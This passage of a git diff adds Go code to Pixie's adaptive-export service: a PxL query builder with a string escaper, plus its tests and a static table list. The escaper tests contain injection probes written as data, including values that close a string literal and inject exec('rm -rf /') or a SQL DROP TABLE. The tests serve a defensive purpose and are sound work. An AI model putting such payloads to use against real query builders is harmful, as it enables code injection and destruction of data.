+// generously-padded relative bound and post-filter precisely with
+// px.int64_to_time on the time_ column).
+func QueryFor(table string, t anomaly.Target, sliceStart, sliceEnd, now time.Time) (string, error) {
+ if !IsBuiltin(table) {
+ return "", fmt.Errorf("%w: %q", ErrUnknownTable, table)
+ }
+ // pad covers (now - sliceStart) plus a 30s safety margin. When
+ // sliceStart is in the future (caller bug), now.Sub is negative and
+ // we'd ask pixie for a positive-only relative start; clamp to 30s.
+ pad := now.Sub(sliceStart) + 30*time.Second
+ if pad < 30*time.Second {
+ pad = 30 * time.Second
+ }
+ relStart := "-" + strconv.FormatInt(int64(pad/time.Second), 10) + "s"
+
+ var b strings.Builder
+ b.WriteString(pxSetMaxRows)
+ b.WriteString("import px\n")
+ b.WriteString("df = px.DataFrame(table='" + table + "', start_time='" + relStart + "')\n")
+ b.WriteString("df = df[df.time_ >= px.int64_to_time(" + strconv.FormatInt(sliceStart.UnixNano(), 10) + ")]\n")
+ b.WriteString("df = df[df.time_ < px.int64_to_time(" + strconv.FormatInt(sliceEnd.UnixNano(), 10) + ")]\n")
+ b.WriteString("df.namespace = px.upid_to_namespace(df.upid)\n")
+ // px.upid_to_pod_name returns "/" (carnot:
+ // metadata_ops.h UPIDToPodNameUDF::Exec → absl::Substitute("$0/$1", ns, name)),
+ // not the bare pod name. Filtering against bare t.Pod would always
+ // miss; build the namespaced key when we have both fields.
+ b.WriteString("df.pod = px.upid_to_pod_name(df.upid)\n")
+ if t.Namespace != "" {
+ b.WriteString("df = df[df.namespace == '" + escapePxL(t.Namespace) + "']\n")
+ }
+ if t.Pod != "" {
+ if t.Namespace != "" {
+ // Both fields present — use exact equality on the namespaced key.
+ b.WriteString("df = df[df.pod == '" + escapePxL(t.Namespace+"/"+t.Pod) + "']\n")
+ } else {
+ // Pod-only fallback: df.pod is "/", so a bare-pod
+ // equality always misses. Regex-anchor "/" via
+ // px.regex_match so the defensive path stays functional.
+ b.WriteString("df = df[px.regex_match('^[^/]+/" + escapePxL(regexp.QuoteMeta(t.Pod)) + "$', df.pod)]\n")
+ }
+ }
+ b.WriteString("px.display(df, '" + table + "')\n")
+ return b.String(), nil
+}
+
+// pxlEscaper turns raw bytes that could break out of a PxL single-quoted
+// string into their Python-style escape sequences. The backslash MUST be
+// mapped FIRST so its own substitution doesn't get double-escaped when
+// processed alongside the rest.
+//
+// Why each entry: PxL is Python; a single-quoted literal closes on a bare
+// ' and a raw newline (0x0A) terminates the statement, letting an
+// attacker-controlled Target.Pod/Target.Namespace value inject a new
+// PxL statement after the close. ', \r, \n, \t, and NUL are the
+// byte-level shapes that can break the string boundary; everything
+// else is opaque to the PxL parser inside a string literal.
+var pxlEscaper = strings.NewReplacer(
+ `\`, `\\`,
+ `'`, `\'`,
+ "\n", `\n`,
+ "\r", `\r`,
+ "\t", `\t`,
+ "\x00", `\0`,
+)
+
+func escapePxL(s string) string {
+ return pxlEscaper.Replace(s)
+}
diff --git a/src/vizier/services/adaptive_export/internal/pxl/queryfor_bench_test.go b/src/vizier/services/adaptive_export/internal/pxl/queryfor_bench_test.go
new file mode 100644
index 00000000000..64de6290687
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/pxl/queryfor_bench_test.go
@@ -0,0 +1,69 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package pxl
+
+import (
+ "testing"
+ "time"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly"
+)
+
+// pxl.QueryFor sits on the controller fan-out path: ONE QueryFor call
+// per (anomaly_hash, table) tuple per pass. With 11 PushPixieTables and
+// N active anomaly windows, the per-pass cost is 11×N QueryFor calls
+// (plus 11×N broker queries that the QueryFor strings parameterise).
+//
+// At sustained 100 active anomalies → 1100 QueryFor/sec. Allocation
+// behaviour of fmt.Sprintf-style string builders is what the bench
+// quantifies — informs whether sync.Pool'd strings.Builder would pay
+// off if QueryFor turns up in CPU profiles.
+
+func BenchmarkQueryFor_http_events(b *testing.B) {
+ t := anomaly.Target{
+ PID: 12345,
+ Comm: "java",
+ Pod: "backend-vulnerable-779cd9d765-mxr8t",
+ Namespace: "log4j-poc",
+ }
+ now := time.Now()
+ start := now.Add(-30 * time.Second)
+ b.ReportAllocs()
+ b.ResetTimer()
+ for i := 0; i < b.N; i++ {
+ _, _ = QueryFor("http_events", t, start, now, now)
+ }
+}
+
+// BenchmarkQueryFor_AllTables varies the table across all 13 BuiltinTables
+// to ensure we're not missing a slow-path on a specific table.
+func BenchmarkQueryFor_AllTables(b *testing.B) {
+ t := anomaly.Target{
+ PID: 12345,
+ Comm: "java",
+ Pod: "backend-vulnerable-779cd9d765-mxr8t",
+ Namespace: "log4j-poc",
+ }
+ now := time.Now()
+ start := now.Add(-30 * time.Second)
+ tables := Names(Builtins())
+ b.ReportAllocs()
+ b.ResetTimer()
+ for i := 0; i < b.N; i++ {
+ _, _ = QueryFor(tables[i%len(tables)], t, start, now, now)
+ }
+}
diff --git a/src/vizier/services/adaptive_export/internal/pxl/queryfor_test.go b/src/vizier/services/adaptive_export/internal/pxl/queryfor_test.go
new file mode 100644
index 00000000000..562ea794cc0
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/pxl/queryfor_test.go
@@ -0,0 +1,342 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package pxl
+
+import (
+ "errors"
+ "strings"
+ "testing"
+ "time"
+
+ "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly"
+)
+
+// fixed reference time for deterministic relStart computation.
+var (
+ fixedNow = time.Date(2026, 5, 9, 15, 23, 44, 0, time.UTC)
+ fixedStart = fixedNow.Add(-5 * time.Minute) // ATTACK − 5 min
+ fixedEnd = fixedNow.Add(5 * time.Minute) // ATTACK + 5 min
+ target = anomaly.Target{
+ PID: 12345, Comm: "redis-server",
+ Pod: "redis-6fbcfb97c-82qxv", Namespace: "redis",
+ }
+)
+
+// TestQueryFor_UnknownTable — non-builtin tables wrap ErrUnknownTable.
+func TestQueryFor_UnknownTable(t *testing.T) {
+ _, err := QueryFor("nope_table", target, fixedStart, fixedEnd, fixedNow)
+ if err == nil || !errors.Is(err, ErrUnknownTable) {
+ t.Fatalf("want ErrUnknownTable wrapper, got %v", err)
+ }
+ if !strings.Contains(err.Error(), `"nope_table"`) {
+ t.Fatalf("error must echo the bad table name; got %v", err)
+ }
+}
+
+// TestQueryFor_NamespacedPodFilter — px.upid_to_pod_name returns
+// "/" (verified in carnot's metadata_ops.h:387). The
+// generated PxL must filter against the namespaced key when both
+// fields are non-empty.
+func TestQueryFor_NamespacedPodFilter(t *testing.T) {
+ q, err := QueryFor("redis_events", target, fixedStart, fixedEnd, fixedNow)
+ if err != nil {
+ t.Fatalf("QueryFor: %v", err)
+ }
+ wantPodFilter := `df = df[df.pod == 'redis/redis-6fbcfb97c-82qxv']`
+ if !strings.Contains(q, wantPodFilter) {
+ t.Fatalf("expected pod filter %q in:\n%s", wantPodFilter, q)
+ }
+ wantNS := `df = df[df.namespace == 'redis']`
+ if !strings.Contains(q, wantNS) {
+ t.Fatalf("expected namespace filter %q in:\n%s", wantNS, q)
+ }
+}
+
+// TestQueryFor_NamespaceOnly — only namespace filter when Pod is empty.
+func TestQueryFor_NamespaceOnly(t *testing.T) {
+ tNoPod := anomaly.Target{Namespace: "redis"}
+ q, err := QueryFor("redis_events", tNoPod, fixedStart, fixedEnd, fixedNow)
+ if err != nil {
+ t.Fatalf("QueryFor: %v", err)
+ }
+ if !strings.Contains(q, `df = df[df.namespace == 'redis']`) {
+ t.Fatalf("expected namespace filter; got:\n%s", q)
+ }
+ if strings.Contains(q, "df = df[df.pod ==") {
+ t.Fatalf("did not expect pod filter when Pod is empty; got:\n%s", q)
+ }
+}
+
+// TestQueryFor_PodOnly — when Namespace is empty but Pod is set, fall
+// back to a regex match on `*/` since px.upid_to_pod_name always
+// returns "/" — a bare-pod equality filter would always
+// miss. The defensive path stays usable instead of being silently broken.
+func TestQueryFor_PodOnly(t *testing.T) {
+ tNoNS := anomaly.Target{Pod: "redis-foo"}
+ q, err := QueryFor("redis_events", tNoNS, fixedStart, fixedEnd, fixedNow)
+ if err != nil {
+ t.Fatalf("QueryFor: %v", err)
+ }
+ // Must NOT emit the bare-pod equality (CR: that's a known-miss filter).
+ if strings.Contains(q, `df = df[df.pod == 'redis-foo']`) {
+ t.Fatalf("regression: emitted bare-pod equality that always misses:\n%s", q)
+ }
+ // Must emit a working filter that matches "/redis-foo".
+ want := `df = df[px.regex_match('^[^/]+/redis-foo$', df.pod)]`
+ if !strings.Contains(q, want) {
+ t.Fatalf("expected regex-anchored pod filter\nwant: %s\ngot:\n%s", want, q)
+ }
+ if strings.Contains(q, "df = df[df.namespace ==") {
+ t.Fatalf("did not expect namespace filter; got:\n%s", q)
+ }
+}
+
+// TestQueryFor_NoTargetFilters — empty Target → no namespace OR pod
+// filter (caller-driven coarse query).
+func TestQueryFor_NoTargetFilters(t *testing.T) {
+ q, err := QueryFor("redis_events", anomaly.Target{}, fixedStart, fixedEnd, fixedNow)
+ if err != nil {
+ t.Fatalf("QueryFor: %v", err)
+ }
+ if strings.Contains(q, "df.namespace ==") || strings.Contains(q, "df.pod ==") {
+ t.Fatalf("expected no namespace/pod filter for empty Target; got:\n%s", q)
+ }
+}
+
+// TestQueryFor_TimeBoundsAreInclusiveLowerExclusiveUpper — sliceStart
+// is `>=`; sliceEnd is `<`. Encoded as nanos.
+func TestQueryFor_TimeBoundsAreInclusiveLowerExclusiveUpper(t *testing.T) {
+ q, err := QueryFor("redis_events", target, fixedStart, fixedEnd, fixedNow)
+ if err != nil {
+ t.Fatalf("QueryFor: %v", err)
+ }
+ wantLower := `df = df[df.time_ >= px.int64_to_time(1778339924000000000)]` // 15:18:44 UTC ns
+ wantUpper := `df = df[df.time_ < px.int64_to_time(1778340524000000000)]` // 15:28:44 UTC ns
+ if !strings.Contains(q, wantLower) {
+ t.Fatalf("expected lower bound %q in:\n%s", wantLower, q)
+ }
+ if !strings.Contains(q, wantUpper) {
+ t.Fatalf("expected upper bound %q in:\n%s", wantUpper, q)
+ }
+}
+
+// TestQueryFor_RelativeStartTime — pad covers (now − sliceStart) plus
+// 30 s. With ATTACK − 5min as sliceStart and now == ATTACK, pad is
+// 5 min + 30 s = 330 s.
+func TestQueryFor_RelativeStartTime(t *testing.T) {
+ q, err := QueryFor("redis_events", target, fixedStart, fixedEnd, fixedNow)
+ if err != nil {
+ t.Fatalf("QueryFor: %v", err)
+ }
+ if !strings.Contains(q, "start_time='-330s'") {
+ t.Fatalf("expected start_time='-330s' in:\n%s", q)
+ }
+}
+
+// TestQueryFor_PadFloorOn30sWhenSliceStartIsFuture — caller-bug case;
+// pad clamps to 30 s rather than emitting a positive (forward) start.
+func TestQueryFor_PadFloorOn30sWhenSliceStartIsFuture(t *testing.T) {
+ futureStart := fixedNow.Add(1 * time.Minute) // sliceStart > now
+ q, err := QueryFor("redis_events", target, futureStart, fixedEnd, fixedNow)
+ if err != nil {
+ t.Fatalf("QueryFor: %v", err)
+ }
+ if !strings.Contains(q, "start_time='-30s'") {
+ t.Fatalf("expected start_time='-30s' clamp in:\n%s", q)
+ }
+}
+
+// TestQueryFor_EscapesSingleQuoteInTarget — apostrophes in pod /
+// namespace get backslash-escaped so they don't break out of the
+// PxL string literal.
+func TestQueryFor_EscapesSingleQuoteInTarget(t *testing.T) {
+ tWeird := anomaly.Target{Namespace: "ns'with'quotes", Pod: "p'od"}
+ q, err := QueryFor("redis_events", tWeird, fixedStart, fixedEnd, fixedNow)
+ if err != nil {
+ t.Fatalf("QueryFor: %v", err)
+ }
+ if !strings.Contains(q, `df = df[df.namespace == 'ns\'with\'quotes']`) {
+ t.Fatalf("expected escaped namespace; got:\n%s", q)
+ }
+ if !strings.Contains(q, `df = df[df.pod == 'ns\'with\'quotes/p\'od']`) {
+ t.Fatalf("expected escaped namespaced pod key; got:\n%s", q)
+ }
+}
+
+// TestQueryFor_EscapesBackslashInTarget — backslashes too. Asserts
+// both namespace and the namespaced pod-key forms are escaped, so a
+// `Pod` containing `\` can't terminate the PxL string literal.
+func TestQueryFor_EscapesBackslashInTarget(t *testing.T) {
+ tWeird := anomaly.Target{Namespace: `ns\back`, Pod: `p\od`}
+ q, err := QueryFor("redis_events", tWeird, fixedStart, fixedEnd, fixedNow)
+ if err != nil {
+ t.Fatalf("QueryFor: %v", err)
+ }
+ if !strings.Contains(q, `df = df[df.namespace == 'ns\\back']`) {
+ t.Fatalf("expected escaped namespace; got:\n%s", q)
+ }
+ if !strings.Contains(q, `df = df[df.pod == 'ns\\back/p\\od']`) {
+ t.Fatalf("expected escaped namespaced pod key; got:\n%s", q)
+ }
+}
+
+// TestQueryFor_EveryBuiltinTableEmits — smoke-test all known tables
+// produce a syntactically-shaped PxL output (compile-not-tested).
+func TestQueryFor_EveryBuiltinTableEmits(t *testing.T) {
+ for _, table := range Names(builtinTables) {
+ q, err := QueryFor(table, target, fixedStart, fixedEnd, fixedNow)
+ if err != nil {
+ t.Fatalf("table %s: %v", table, err)
+ }
+ if !strings.HasPrefix(q, "#px:set max_output_rows_per_table=1000000\nimport px\n") {
+ t.Fatalf("table %s: expected #px:set cap header then import px; got:\n%s", table, q)
+ }
+ if !strings.Contains(q, "px.display(df, '"+table+"')") {
+ t.Fatalf("table %s: expected px.display call with table name; got:\n%s", table, q)
+ }
+ }
+}
+
+// TestEscapePxL_TableDriven — direct coverage of the escaper. Every byte
+// that could break out of a single-quoted PxL string literal must come
+// back as a non-breaking escape sequence.
+func TestEscapePxL_TableDriven(t *testing.T) {
+ cases := []struct{ in, want string }{
+ {"", ""},
+ {"plain", "plain"},
+ {"o'malley", `o\'malley`},
+ {`back\slash`, `back\\slash`},
+ {`mix'and\back`, `mix\'and\\back`},
+ {"'; DROP TABLE alerts; --", `\'; DROP TABLE alerts; --`},
+ // Byte-level string-breaking attempts: a raw \n would terminate
+ // the PxL statement and inject a new one on the next line. The
+ // escaper turns these into Python-style escape sequences that
+ // PxL renders as inert backslash-letter pairs inside the string.
+ {"line1\nline2", `line1\nline2`},
+ {"line1\r\nline2", `line1\r\nline2`},
+ {"col1\tcol2", `col1\tcol2`},
+ {"trailing\x00", `trailing\0`},
+ // The full injection probe targeting Target.Pod/Target.Namespace:
+ // close the literal, inject a new statement, comment out the
+ // trailing fragment. The escaper neutralises the close + newline;
+ // the trailing # stays as a literal '#' inside the string.
+ {"redis-pod', exec('rm -rf /'), '\n#", `redis-pod\', exec(\'rm -rf /\'), \'\n#`},
+ }
+ for _, c := range cases {
+ if got := escapePxL(c.in); got != c.want {
+ t.Errorf("escapePxL(%q) = %q, want %q", c.in, got, c.want)
+ }
+ }
+}
+
+// TestQueryFor_RejectsInjectionInTargetFields drives QueryFor with
+// adversarial Pod/Namespace values and asserts the resulting PxL has
+// EXACTLY the line count of a clean call — proving an injected newline
+// can't add a statement, and the embedded literal stays single-quoted.
+//
+// PxL line breakdown for a fully-populated Target (cf. QueryFor):
+//
+// #px:set ... 1
+// import px 1
+// df = px.DataFrame(...) 1
+// df = df[df.time_ >= ...] 1
+// df = df[df.time_ < ...] 1
+// df.namespace = px.upid_to_namespace(...) 1
+// df.pod = px.upid_to_pod_name(...) 1
+// df = df[df.namespace == '...'] 1
+// df = df[df.pod == '...'] 1
+// px.display(df, '...') 1
+// (trailing newline → empty 11th split) 1
+//
+// Total: 10 statements + trailing empty == strings.Split == 11 entries.
+func TestQueryFor_RejectsInjectionInTargetFields(t *testing.T) {
+ const wantLines = 11
+
+ cases := []struct {
+ name string
+ target anomaly.Target
+ }{
+ {
+ name: "newline-in-pod",
+ target: anomaly.Target{Pod: "p\n', exec('rm -rf /'), '", Namespace: "ns"},
+ },
+ {
+ name: "newline-in-namespace",
+ target: anomaly.Target{Pod: "p", Namespace: "ns\n', exec('rm -rf /'), '"},
+ },
+ {
+ name: "single-quote-only",
+ target: anomaly.Target{Pod: "p'); display('owned", Namespace: "ns"},
+ },
+ {
+ name: "carriage-return",
+ target: anomaly.Target{Pod: "p\rexec('owned')", Namespace: "ns"},
+ },
+ {
+ name: "backslash-escape-of-escape",
+ target: anomaly.Target{Pod: `p\', exec('owned'), \'`, Namespace: "ns"},
+ },
+ {
+ name: "null-byte",
+ target: anomaly.Target{Pod: "p\x00bonus", Namespace: "ns"},
+ },
+ {
+ name: "tab-bytes",
+ target: anomaly.Target{Pod: "p\texec('owned')", Namespace: "ns"},
+ },
+ }
+ for _, c := range cases {
+ t.Run(c.name, func(t *testing.T) {
+ q, err := QueryFor("http_events", c.target, fixedStart, fixedEnd, fixedNow)
+ if err != nil {
+ t.Fatalf("QueryFor: %v", err)
+ }
+ if got := strings.Count(q, "\n") + 1; got != wantLines {
+ t.Fatalf("got %d lines, want %d (injection succeeded?)\n%s", got, wantLines, q)
+ }
+ // The exact statement count: each line must start with
+ // either #px:, import, df, or px.display — anything else is
+ // a smuggled call.
+ for i, line := range strings.Split(q, "\n") {
+ if line == "" {
+ continue
+ }
+ if !strings.HasPrefix(line, "#px:") &&
+ !strings.HasPrefix(line, "import ") &&
+ !strings.HasPrefix(line, "df") &&
+ !strings.HasPrefix(line, "px.display") {
+ t.Fatalf("line %d looks injected: %q\nfull script:\n%s", i, line, q)
+ }
+ }
+ })
+ }
+}
+
+// TestQueryFor_PodOnlyRegexEscapesQuoteMetaInjection — the bare-pod
+// fallback uses regexp.QuoteMeta + escapePxL; verify a pod name carrying
+// regex meta chars + a single quote both survive without breaking out
+// of the px.regex_match literal.
+func TestQueryFor_PodOnlyRegexEscapesQuoteMetaInjection(t *testing.T) {
+ tgt := anomaly.Target{Pod: "p.*'; exec('owned')"}
+ q, err := QueryFor("http_events", tgt, fixedStart, fixedEnd, fixedNow)
+ if err != nil {
+ t.Fatalf("QueryFor: %v", err)
+ }
+ if strings.Contains(q, "exec(") || strings.Count(q, "\n") > 9 {
+ t.Fatalf("pod-only path injection succeeded:\n%s", q)
+ }
+}
diff --git a/src/vizier/services/adaptive_export/internal/pxl/tables.go b/src/vizier/services/adaptive_export/internal/pxl/tables.go
new file mode 100644
index 00000000000..c29284ad58a
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/pxl/tables.go
@@ -0,0 +1,132 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+// Package pxl carries the strongly-typed list of pixie observation
+// tables the adaptive-write feature targets, plus a stub Registry
+// extension point for the future-PR work that lets users plug in their
+// own tables alongside their UI-defined retention scripts.
+//
+// Importantly: the operator does NOT execute PxL itself in the current
+// design. Pixie's retention plugin runs the user-defined PxL scripts
+// and populates ClickHouse. This package is only used to:
+// - enumerate the pixie tables the operator is aware of
+// - keep a stable, named, audit-friendly set (no dynamic discovery)
+// - declare the future Registry extension surface
+package pxl
+
+// TableSpec is the strongly-typed identity of one pixie socket_tracer
+// table the operator knows about. Bare-string identifiers are
+// deliberately avoided in callers — TableSpec carries the table name
+// today and is the natural place to attach future fields (column
+// projections, retention TTLs, semantic tags) without breaking the API.
+type TableSpec struct {
+ // Name is the ClickHouse / Pixie table name. Dotted names
+ // (e.g. "http2_messages.beta") are stored verbatim; backtick
+ // quoting is the responsibility of SQL emitters.
+ Name string
+
+ // Protocol is the wire protocol the table observes. Documentary;
+ // helps an operator audit "which tables are about HTTP".
+ Protocol string
+}
+
+// builtinTables enumerates the 13 pixie socket_tracer tables the
+// adaptive-write feature is shipped with. The order is stable and
+// matches the project's published documentation. Do NOT loop over
+// dynamic discovery to populate this — strong static definition is
+// the requirement. Unexported so the slice cannot be mutated by
+// external callers; use [Builtins] or [DefaultRegistry] for read
+// access (both return defensive copies).
+//
+// conn_stats was previously out-of-scope (rev-1) but is re-added for
+// the rev-2 schema — the rev-2 ClickHouse schema now carries it and the
+// retention-script preset emits it alongside the protocol-events
+// tables. Unlike the protocol tables it carries counters, not
+// per-message rows; ClickHouse MERGEs snapshot rows over the order
+// key (no aggregating engine — each retention-script pull is its own
+// snapshot row).
+var builtinTables = []TableSpec{
+ {Name: "http_events", Protocol: "HTTP/1.x"},
+ {Name: "http2_messages.beta", Protocol: "HTTP/2 + gRPC"},
+ {Name: "dns_events", Protocol: "DNS"},
+ {Name: "redis_events", Protocol: "Redis (RESP)"},
+ {Name: "mysql_events", Protocol: "MySQL"},
+ {Name: "pgsql_events", Protocol: "PostgreSQL"},
+ {Name: "cql_events", Protocol: "Cassandra / CQL"},
+ {Name: "mongodb_events", Protocol: "MongoDB"},
+ {Name: "kafka_events.beta", Protocol: "Kafka"},
+ {Name: "amqp_events", Protocol: "AMQP / RabbitMQ"},
+ {Name: "mux_events", Protocol: "Mux (Twitter Finagle)"},
+ {Name: "tls_events", Protocol: "TLS handshake"},
+ {Name: "conn_stats", Protocol: "Connection-level statistics"},
+}
+
+// Registry is the extension surface for users to register their own
+// tables alongside the built-ins. STUB — not wired into the controller
+// or main.go in this PR. The intended future shape is:
+//
+// ctlCfg.Registry = pxl.Compose(pxl.DefaultRegistry(), userRegistry)
+//
+// where Compose merges built-ins with user additions, and the
+// controller iterates Registry.Tables() instead of builtinTables.
+//
+// Today the controller and main.go consume BuiltinTables directly.
+// The future PR will plumb a Registry through controller.Config and
+// rewrite the consumers.
+type Registry interface {
+ Tables() []TableSpec
+}
+
+// DefaultRegistry returns a Registry over the built-in tables.
+// Future-PR callers compose this with user-supplied registries.
+func DefaultRegistry() Registry { return defaultRegistry{} }
+
+type defaultRegistry struct{}
+
+// Tables returns a defensive copy so callers cannot mutate the
+// package-level table list at runtime.
+func (defaultRegistry) Tables() []TableSpec {
+ return append([]TableSpec(nil), builtinTables...)
+}
+
+// Builtins returns a defensive copy of the built-in table list.
+// Prefer this over a (now removed) exported slice so the global
+// registry cannot be aliased and mutated by callers.
+func Builtins() []TableSpec {
+ return append([]TableSpec(nil), builtinTables...)
+}
+
+// Names projects a []TableSpec to a []string for legacy callers that
+// take bare names. Useful at API boundaries that haven't been
+// strong-typed yet (controller.Config.Tables is one).
+func Names(specs []TableSpec) []string {
+ out := make([]string, len(specs))
+ for i, s := range specs {
+ out[i] = s.Name
+ }
+ return out
+}
+
+// IsBuiltin reports whether the given name is one of the built-in
+// tables. Bare-string callers can use this as a defensive guard.
+func IsBuiltin(name string) bool {
+ for _, t := range builtinTables {
+ if t.Name == name {
+ return true
+ }
+ }
+ return false
+}
diff --git a/src/vizier/services/adaptive_export/internal/pxl/tables_test.go b/src/vizier/services/adaptive_export/internal/pxl/tables_test.go
new file mode 100644
index 00000000000..273c0f625ee
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/pxl/tables_test.go
@@ -0,0 +1,128 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+// SPDX-License-Identifier: Apache-2.0
+
+package pxl
+
+import (
+ "testing"
+)
+
+// TestBuiltinTables_Count — guard against accidental list churn.
+// The set is the 13 socket_tracer tables in pixie's stirling layer
+// (http_events, http2_messages.beta, dns_events, redis_events,
+// mysql_events, pgsql_events, cql_events, mongodb_events,
+// kafka_events.beta, amqp_events, mux_events, tls_events, conn_stats).
+// Update this guard if the spec adds / removes a table.
+func TestBuiltinTables_Count(t *testing.T) {
+ const want = 13
+ if got := len(builtinTables); got != want {
+ t.Fatalf("builtinTables = %d entries, want %d", got, want)
+ }
+}
+
+// TestBuiltinTables_AllNamesUnique — no duplicates.
+func TestBuiltinTables_AllNamesUnique(t *testing.T) {
+ seen := map[string]bool{}
+ for _, sp := range builtinTables {
+ if seen[sp.Name] {
+ t.Fatalf("duplicate table %q in builtinTables", sp.Name)
+ }
+ seen[sp.Name] = true
+ }
+}
+
+// TestBuiltinTables_AllHaveProtocol — each entry is annotated, so audit
+// queries like "which tables observe HTTP?" work without parsing the name.
+func TestBuiltinTables_AllHaveProtocol(t *testing.T) {
+ for _, sp := range builtinTables {
+ if sp.Protocol == "" {
+ t.Fatalf("BuiltinTable %q missing Protocol annotation", sp.Name)
+ }
+ }
+}
+
+// TestIsBuiltin — defensive guard for bare-string callers.
+func TestIsBuiltin(t *testing.T) {
+ if !IsBuiltin("redis_events") {
+ t.Fatalf("redis_events should be a builtin")
+ }
+ if !IsBuiltin("http2_messages.beta") {
+ t.Fatalf("dotted table http2_messages.beta should be a builtin")
+ }
+ if !IsBuiltin("conn_stats") {
+ t.Fatalf("conn_stats was re-added; should be builtin")
+ }
+ if IsBuiltin("") {
+ t.Fatalf("empty string should not be builtin")
+ }
+}
+
+// TestDefaultRegistry — stub returns builtinTables.
+func TestDefaultRegistry(t *testing.T) {
+ r := DefaultRegistry()
+ got := r.Tables()
+ if len(got) != len(builtinTables) {
+ t.Fatalf("DefaultRegistry().Tables() len %d, want %d", len(got), len(builtinTables))
+ }
+ for i, sp := range builtinTables {
+ if got[i] != sp {
+ t.Fatalf("DefaultRegistry().Tables()[%d] = %+v, want %+v", i, got[i], sp)
+ }
+ }
+}
+
+// TestNames — projection to []string preserves order.
+func TestNames(t *testing.T) {
+ names := Names(builtinTables)
+ if len(names) != len(builtinTables) {
+ t.Fatalf("Names len mismatch")
+ }
+ if names[0] != "http_events" {
+ t.Fatalf("first name = %q, want http_events", names[0])
+ }
+}
+
+// TestDefaultRegistry_Tables_IsCopy — defensive: callers cannot mutate
+// the package-level table list by aliasing the slice returned from
+// DefaultRegistry().Tables(). Append-to-zero-cap is the easy gotcha:
+// if Tables() handed out the backing slice directly, an append-without-
+// reallocation would clobber the next builtin.
+func TestDefaultRegistry_Tables_IsCopy(t *testing.T) {
+ got := DefaultRegistry().Tables()
+ if len(got) == 0 {
+ t.Fatalf("DefaultRegistry().Tables() is empty")
+ }
+ want0 := builtinTables[0].Name
+ got[0].Name = "MUTATED"
+ if builtinTables[0].Name != want0 {
+ t.Fatalf("mutation through DefaultRegistry().Tables() leaked: builtinTables[0].Name=%q, want %q",
+ builtinTables[0].Name, want0)
+ }
+}
+
+// TestBuiltins_IsCopy — same guarantee for the Builtins() accessor.
+func TestBuiltins_IsCopy(t *testing.T) {
+ got := Builtins()
+ if len(got) == 0 {
+ t.Fatalf("Builtins() is empty")
+ }
+ want0 := builtinTables[0].Name
+ got[0].Name = "MUTATED"
+ if builtinTables[0].Name != want0 {
+ t.Fatalf("mutation through Builtins() leaked: builtinTables[0].Name=%q, want %q",
+ builtinTables[0].Name, want0)
+ }
+}
diff --git a/src/vizier/services/adaptive_export/internal/reconcile/BUILD.bazel b/src/vizier/services/adaptive_export/internal/reconcile/BUILD.bazel
new file mode 100644
index 00000000000..3b0dafe2ebf
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/reconcile/BUILD.bazel
@@ -0,0 +1,24 @@
+# Copyright 2018- The Pixie Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+# SPDX-License-Identifier: Apache-2.0
+
+load("@io_bazel_rules_go//go:def.bzl", "go_library")
+
+go_library(
+ name = "reconcile",
+ srcs = ["reconcile.go"],
+ importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/reconcile",
+ visibility = ["//src/vizier/services/adaptive_export:__subpackages__"],
+)
diff --git a/src/vizier/services/adaptive_export/internal/reconcile/reconcile.go b/src/vizier/services/adaptive_export/internal/reconcile/reconcile.go
new file mode 100644
index 00000000000..3470ca92339
--- /dev/null
+++ b/src/vizier/services/adaptive_export/internal/reconcile/reconcile.go
@@ -0,0 +1,65 @@
+// Copyright 2018- The Pixie Authors.
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
